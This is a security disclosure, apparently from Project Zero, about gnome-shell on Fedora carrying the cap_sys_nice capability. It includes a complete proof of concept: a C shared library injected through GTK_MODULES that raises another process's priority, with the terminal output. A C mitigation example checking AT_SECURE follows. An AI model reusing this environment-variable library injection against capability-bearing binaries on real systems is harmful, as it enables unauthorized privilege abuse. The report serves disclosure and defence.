fedora: gnome not using fscaps safely

I happened to notice a minor issue while working on a tool I'm writing. I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice:

    $ rpm -qf /bin/gnome-shell
    gnome-shell-3.38.4-1.fc33.x86_64
    $ getcap /bin/gnome-shell
    /bin/gnome-shell cap_sys_nice=ep

This seems incorrect. Here is a demo: I'm just a regular user, and this pid has a priority of 0:

    $ ps -heo nice -q 495980
      0

I don't have permission to raise that:

    $ renice -n -20 495980
    renice: failed to set priority for 495980 (process ID): Permission denied

But it doesn't matter, I can just make gnome do it:

    $ cat prio.c
    #include <sys/time.h>
    #include <sys/resource.h>
    #include <unistd.h>

    void __attribute__((constructor)) init()
    {
        setpriority(PRIO_PROCESS, 495980, -20);
        _exit(0);
    }
    $ gcc -fPIC -shared -o prio.so prio.c
    $ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes

And if I look at the priority now...

    $ ps -heo nice -q 495980
    -20

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is YYYY-MM-DD. Disclosure at an earlier date is possible if agreed upon by all parties.

Found by: taviso@google.com
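
One mitigation for the pattern in the report, as an added example (not code from the report, gnome-shell or GTK): a program that can be installed with file capabilities checks the kernel's AT_SECURE flag before it accepts a module list from the environment. The function names, the colon-separated list format and the sample value are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/auxv.h>

/* Non-zero when the kernel started this process in secure-execution mode:
 * a set-uid/set-gid binary, or a binary whose file capabilities gave the
 * process privileges (the cap_sys_nice=ep case in the report). */
int in_secure_exec(void)
{
    return getauxval(AT_SECURE) != 0;
}

/* Hypothetical loader policy. `value` is the raw content of a module-list
 * variable, `secure` is the result of in_secure_exec(). Copies up to `max`
 * colon-separated entries into `out` and returns how many were accepted.
 * In secure-execution mode nothing from the environment is accepted. */
int modules_from_env(const char *value, int secure, char out[][256], int max)
{
    int n = 0;

    if (value == NULL || secure)
        return 0;
    while (*value != '\0' && n < max) {
        size_t len = strcspn(value, ":");
        if (len > 0 && len < 256) {      /* skip empty or oversized entries */
            memcpy(out[n], value, len);
            out[n][len] = '\0';
            n++;
        }
        value += len;
        if (*value == ':')
            value++;
    }
    return n;
}

int main(void)
{
    char mods[8][256];
    /* Constructed sample value, not captured from a real session. */
    const char *sample = "/proc/self/cwd/prio.so:example-module";
    int secure = in_secure_exec();
    int n = modules_from_env(sample, secure, mods, 8);

    printf("AT_SECURE=%d, modules accepted from environment: %d\n", secure, n);
    return 0;
}
```

For a single variable, glibc's secure_getenv() performs the same AT_SECURE check and returns NULL in secure-execution mode.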